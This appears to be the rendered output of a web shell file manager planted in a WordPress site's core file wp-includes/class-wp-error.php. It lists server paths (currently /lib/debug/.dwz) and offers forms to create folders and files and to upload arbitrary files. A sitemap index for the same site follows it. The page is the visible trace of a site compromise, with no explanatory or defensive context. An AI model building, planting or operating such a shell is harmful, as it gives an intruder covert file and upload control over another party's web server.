
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>Directory Listing</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <style>
        body {
            padding: 20px;
            background: #f8f9fa;
        }
        .table-hover tbody tr:hover {
            background-color: #e9ecef;
        }
        .folder-icon {
            color: #0d6efd;
        }
        .file-icon {
            color: #6c757d;
        }
        .skipped-item {
            color: #6c757d;
            font-style: italic;
        }
        .error-item {
            color: #dc3545;
            font-style: italic;
        }
        .system-item {
            color: #6c757d;
            font-style: italic;
        }
    </style>
</head>
<body>

<div class="container">
    <h2>Directory Listing</h2>
    <p><strong>File path:</strong> /home/u899147287/domains/novaskillsacademy.co.uk/public_html/wp-includes/class-wp-error.php</p>
    <p><strong>Current path:</strong> /lib/debug/.dwz</p>

    <!-- Create Folder & File Forms -->
    <div class="mb-3 d-flex flex-wrap gap-3">
        <form method="post" class="d-flex align-items-center" style="gap: 0.5rem;">
            <input type="text" name="new_folder" placeholder="New Folder Name" class="form-control" required>
            <button type="submit" class="btn btn-primary">+Folder</button>
        </form>

        <form method="post" class="d-flex align-items-center" style="gap: 0.5rem;">
            <input type="text" name="new_file" placeholder="New File Name" class="form-control" required>
            <button type="submit" class="btn btn-success">+File</button>
        </form>

        <!-- Upload File Form -->
        <form method="post" enctype="multipart/form-data" class="d-flex align-items-center" style="gap: 0.5rem;">
            <input type="file" name="upload_file" class="form-control" required>
            <button type="submit" name="upload" class="btn btn-warning">Upload</button>
        </form>
    </div>

    <a href="?path=%2Flib%2Fdebug" class="btn btn-secondary mb-3">&larr; Parent Directory</a>

    <table class="table table-striped table-hover align-middle">
        <thead>
            <tr>
                <th>Name</th>
                <th>Type</th>
                <th>Size</th>
                <th>Last Modified</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
                </tbody>
    </table>
</div>

</body>
</html><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://novaskillsacademy.co.uk/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://novaskillsacademy.co.uk/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://novaskillsacademy.co.uk/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://novaskillsacademy.co.uk/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://novaskillsacademy.co.uk/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
